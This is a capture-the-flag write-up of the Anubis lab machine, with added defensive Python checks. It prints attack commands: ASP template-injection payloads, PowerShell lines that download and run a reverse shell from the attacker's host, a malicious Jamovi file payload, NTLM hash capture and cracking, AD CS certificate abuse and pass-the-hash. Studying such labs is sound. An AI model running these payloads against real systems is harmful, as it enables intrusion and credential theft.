This is the write-up for the box Anubis, which was retired on 29 January 2022. My IP address was 10.10.14.3 while I did this.
Let's put this in our hosts file:
10.10.11.102 anubis.htb
Starting with a Nmap scan:
nmap -sC -sV -o nmap/anubis.nmap 10.10.11.102
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2022-12-24T15:52:24+00:00; +1h00m01s from scanner time.
| ssl-cert: Subject: commonName=www.windcorp.htb
| Subject Alternative Name: DNS:www.windcorp.htb
| Not valid before: 2021-05-24T19:44:56
|_Not valid after: 2031-05-24T19:54:56
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
The TLS certificate contains the hostname www.windcorp.htb, which has to be added to our /etc/hosts file to access it. The website on this hostname looks like a custom-developed company website and lists potential usernames:
- Walter White (Chief Executive Officer)
- Sarah Jhonson (Product Manager)
- William Anderson (CTO)
- Amanda Jepson (Accountant)
At the bottom of the page is a contact form, where Cross Site Scripting (XSS) can be tested:
Name: Test1
E-mail: [email protected]
Subject: Test 1
Message: <script src="https://10.10.14.3/test.js"></script>
After sending the request, the form redirects to preview.asp and our listener on port 443 receives a request for test.js, so this form is vulnerable.
We can test for Server Side Template Injection (SSTI) by using the polyglot payload from PayloadsAllTheThings in the message field. Removing one symbol at a time, the error persists until the payload is reduced to "${{<", which means that the percent symbol (%) is what triggers the error.
These symbols can be used in ASP to test code execution:
<%= 7*7 %>
preview.asp displays the message as 49, so the expression was evaluated and there is a way to execute code:
Message: 49
Testing a payload that executes whoami:
<%= CreateObject("Wscript.Shell").exec("whoami").StdOut.ReadAll() %>
Message: nt authority\system
I will use the Invoke-PowerShellTcpOneLine.ps1 script from the Nishang framework as the reverse shell command. Downloading and executing the PowerShell script to gain a reverse shell:
<%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/shell.ps1')").StdOut.ReadAll() %>
After sending the request, the script is downloaded and executed, and the listener on my IP on port 9001 receives a shell as the SYSTEM user on the host webserver01. This does not seem to be the target box, but rather a virtualized client or some kind of container.
In the desktop folder of the Administrator user is a file called req.txt, which is a TLS Certificate.
Copying the file and reading it with openssl:
openssl req -in req.txt -noout -text
The certificate contains another hostname, softwareportal.windcorp.htb, which has to be added to our /etc/hosts file. This hostname belongs to a different service, so Chisel can be used to create a tunnel from the machine to our client in order to enumerate ports and other IPs.
Uploading chisel.exe to the box:
curl 10.10.14.3/chisel.exe -o chisel.exe
Starting Chisel server on our client:
./chisel server --socks5 --reverse -p 8000
Connecting to the Chisel server from the box:
.\chisel.exe client 10.10.14.3:8000 R:socks
The subnet is large and a full scan would take a long time, but the default gateway can be scanned for a few well-known ports. The network configuration of webserver01:
IPv4 Address. . . . . . . . . . . : 172.20.180.149
Subnet Mask . . . . . . . . . . . : 255.255.240.0
Default Gateway . . . . . . . . . : 172.20.176.1
Port scanning default gateway:
proxychains nmap -sT -Pn -n -p 80,443 172.20.176.1
PORT STATE SERVICE
80/tcp open http
443/tcp closed https
Adding hostname with the IP to our /etc/hosts file to access it on a browser:
172.20.176.1 softwareportal.windcorp.htb
After configuring the proxy in the browser accordingly, it is possible to access the web service on port 80.
The website has a list of known software packages and, according to the URL, they are pushed to the IP of webserver01:
http://softwareportal.windcorp.htb/install.asp?client=172.20.180.149&software=7z1900-x64.exe
When the client parameter is changed to our own IP and the network traffic is captured with Wireshark, we observe that the server tries to connect to us on port 5985. This port is used for WinRM, so a listener with Responder can be started to intercept the authentication hash:
responder -I tun0
Changing client parameter to our IP and sending the request:
http://softwareportal.windcorp.htb/install.asp?client=10.10.14.3&software=jamovi-1.6.16.0-win64.exe
The NetNTLMv2 hash of the user localadmin is captured:
[WinRM] NTLMv2 Client : 10.10.11.102
[WinRM] NTLMv2 Username : windcorp\localadmin
[WinRM] NTLMv2 Hash : localadmin::windcorp:89cd95c4837c8e29:10E5D931BD8899E673F9642DC3B2(...)
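As an added defensive example (not part of the original write-up), the following Python checks install.asp requests the way the portal should have: the client parameter must be a single address inside the webserver01 subnet (172.20.176.0/20, derived from the ipconfig output) before the server is allowed to open WinRM to it, and the same check is run over constructed IIS-style log lines to find the request that pointed the portal at an outside host. The subnet, the software allowlist and the log format are assumptions.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Assumptions: the managed client subnet (from the ipconfig output of webserver01)
# and the set of packages the portal is meant to serve.
CLIENT_SUBNET = ipaddress.ip_network("172.20.176.0/20")
ALLOWED_SOFTWARE = {"7z1900-x64.exe", "jamovi-1.6.16.0-win64.exe",
                    "VNC-Viewer-6.20.529-Windows.exe"}

def validate_install_request(url):
    """Return (ok, reason) for an install.asp request.

    Only a client address inside CLIENT_SUBNET is accepted, so the portal can
    never be told to open WinRM (and present the localadmin credential) to a
    host outside the network it manages.
    """
    params = parse_qs(urlsplit(url).query)
    client = params.get("client", [None])[0]
    software = params.get("software", [None])[0]
    if client is None or software is None:
        return False, "missing client or software parameter"
    try:
        addr = ipaddress.ip_address(client)
    except ValueError:
        return False, f"client is not an IP address: {client!r}"
    if addr not in CLIENT_SUBNET:
        return False, f"client {addr} is outside {CLIENT_SUBNET}"
    if software not in ALLOWED_SOFTWARE:
        return False, f"unknown software {software!r}"
    return True, "ok"

# Constructed, simplified IIS log lines: date time method uri-stem uri-query status.
SAMPLE_LOG = """\
2022-12-24 15:52:24 GET /install.asp client=172.20.180.149&software=7z1900-x64.exe 200
2022-12-24 15:53:10 GET /install.asp client=10.10.14.3&software=jamovi-1.6.16.0-win64.exe 200
2022-12-24 15:53:12 GET /index.asp - 200
"""
LOG_RE = re.compile(r"^(\S+ \S+) GET (/install\.asp) (\S+) \d+$")

def find_rejected_requests(log_text):
    """Return (timestamp, reason) for every logged install.asp request that the
    validation above would have refused; those are the ones to alert on."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ok, reason = validate_install_request(f"{m.group(2)}?{m.group(3)}")
            if not ok:
                hits.append((m.group(1), reason))
    return hits
```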
Trying to crack the hash with Hashcat:
hashcat -m 5600 anubis_localadmin.hash /usr/share/wordlists/rockyou.txt
Secret123
After a while it gets cracked and the password can be verified by accessing the SMB shares with CrackMapExec:
crackmapexec smb 10.10.11.102 -u localadmin -p Secret123 --shares
Share Permissions Remark
----- ----------- ------
ADMIN$ Remote Admin
C$ Default share
CertEnroll READ Active Directory Certificate Services share
IPC$ READ Remote IPC
NETLOGON READ Logon server share
Shared READ
SYSVOL READ Logon server share
The SMB share Shared is a non-default share, so it should be enumerated:
smbclient -U localadmin //10.10.11.102/Shared
There are two folders:
- Documents
  - Big 5.omv
  - Bugs.omv
  - Tooth Growth.omv
  - Whatif.omv
- Software
  - 7z1900-x64.exe
  - jamovi-1.6.16.0-win64.exe
  - VNC-Viewer-6.20.529-Windows.exe
The Documents folder contains OMV files, which is the file extension used by Jamovi. Jamovi versions 1.6.18 and below are affected by a Cross-Site Scripting (XSS) vulnerability, CVE-2021-28079.
Downloading Whatif.omv to use it as a template for our exploit:
smb: \Documents\Analytics\> get Whatif.omv
Extracting the file:
unzip Whatif.omv
Adding XSS payload to a column name:
(...)
"name": "a<script src='http://10.10.14.3/payload.js'></script>",
"id": 1,
"columnType": "Data",
"dataType": "Decimal",
(...)
Creating the OMV file with zip and naming it Whatif.omv:
zip -r Whatif.omv *
Creating payload.js to execute command:
<script>
require('child_process').exec("powershell IEX((New-Object Net.WebClient).downloadString('http://10.10.14.3/shell.ps1'))")
</script>
Uploading modified Whatif.omv to the SMB share:
smb: \Documents\Analytics\> put Whatif.omv
After a while, the new Whatif.omv is opened on the target and the JavaScript payload runs, executing shell.ps1, so the listener on my IP on port 9001 receives a shell as the user diegocruz.
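As an added example that is not from the write-up or the Jamovi project, this Python scanner inspects an .omv archive the way a share owner could before files in Shared are opened: it parses every JSON member and flags any string value (column names included) that carries markup. The metadata.json layout used for the constructed sample mirrors the snippet above and is an assumption.

```python
import io
import json
import re
import zipfile

# Any HTML/SVG-looking tag; a plain "<5" in a numeric label does not match.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")

def _walk_strings(node, path=""):
    """Yield (json_path, value) for every string inside a parsed JSON document."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from _walk_strings(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from _walk_strings(value, f"{path}[{index}]")
    elif isinstance(node, str):
        yield path, node

def scan_omv(data):
    """Return (member, json_path, value) for every string containing markup.

    data is the raw bytes of an .omv file, which is a zip archive. Every *.json
    member is parsed and all of its strings are checked, so the result does not
    depend on the exact metadata layout Jamovi uses.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for member in archive.namelist():
            if not member.endswith(".json"):
                continue
            try:
                document = json.loads(archive.read(member))
            except ValueError:
                continue  # not JSON after all; nothing to inspect here
            for path, value in _walk_strings(document):
                if TAG_RE.search(value):
                    findings.append((member, path, value))
    return findings

def build_sample_omv(column_name):
    """Constructed .omv with one column, shaped like the metadata snippet above
    (the dataSet/fields nesting is an assumption)."""
    metadata = {"dataSet": {"fields": [
        {"name": column_name, "id": 1, "columnType": "Data", "dataType": "Decimal"}]}}
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("metadata.json", json.dumps(metadata))
    return buffer.getvalue()
```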
Among the SMB shares is CertEnroll, which only exists when Active Directory Certificate Services (AD CS) is installed. The misconfigurations described in the Certified Pre-Owned research will be used to abuse this service.
Tools needed for exploitation: Certify, ADCS.ps1 and Rubeus.
Executing Certify to find vulnerable certificates:
Certify.exe find /vulnerable /currentuser
The template Web is vulnerable, so the Get-SmartCardCertificate function from ADCS.ps1 is used to create a smart card certificate for the Administrator:
Get-SmartCardCertificate -Identity Administrator -TemplateName Web -NoSmartCard
Confirming that a certificate was created:
gci cert:\currentuser\my -recurse
Running Rubeus to authenticate with the certificate and retrieve the NTLM hash of Administrator:
Rubeus.exe asktgt /user:Administrator /certificate:E5EF6773C206F55C4DDAEE3C222AC729005075A4 /getcredentials
Using impacket-psexec to authenticate to the box with the hash:
impacket-psexec -hashes 3CCC18280610C6CA3156F995B5899E09:3CCC18280610C6CA3156F995B5899E09 [email protected]
The hash is accepted and starts a shell as the SYSTEM user!
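As an added auditing example (not the write-up's own code), the check below evaluates a certificate template against the ESC1 conditions from the Certified Pre-Owned paper, which is the misconfiguration that a certificate request naming another identity relies on; it is what an administrator would run over exported template settings to find what Certify found. The attribute names are the real AD CS template LDAP attributes, while the attribute values of the constructed Web and fixed templates are assumptions.

```python
# Real flag bits and EKU OIDs from the AD CS template schema.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag: manager approval
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
# Constructed list of principals that should never be able to enroll in a
# template meeting the other three conditions.
LOW_PRIV_PRINCIPALS = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}

def esc1_findings(template):
    """Return the ESC1 conditions a template meets; all four together mean a
    low-privileged user can request a logon certificate for any account."""
    reasons = []
    if template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("enrollee supplies subject, so the SAN can name any account")
    if not template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        reasons.append("no manager approval required")
    ekus = set(template["pKIExtendedKeyUsage"])
    if not ekus or ekus & AUTH_EKUS:  # an empty EKU list allows every purpose
        reasons.append("certificate is usable for authentication")
    if set(template["enroll"]) & LOW_PRIV_PRINCIPALS:
        reasons.append("low-privileged principals have enrollment rights")
    return reasons

def is_esc1_vulnerable(template):
    return len(esc1_findings(template)) == 4

# Constructed settings shaped like the vulnerable Web template, and a fixed copy
# that makes the subject come from AD and requires manager approval.
WEB_TEMPLATE = {
    "name": "Web",
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1", "1.3.6.1.5.5.7.3.2"],  # Server + Client Auth
    "enroll": ["Domain Users"],
}
FIXED_TEMPLATE = {**WEB_TEMPLATE,
                  "msPKI-Certificate-Name-Flag": 0,
                  "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS}
```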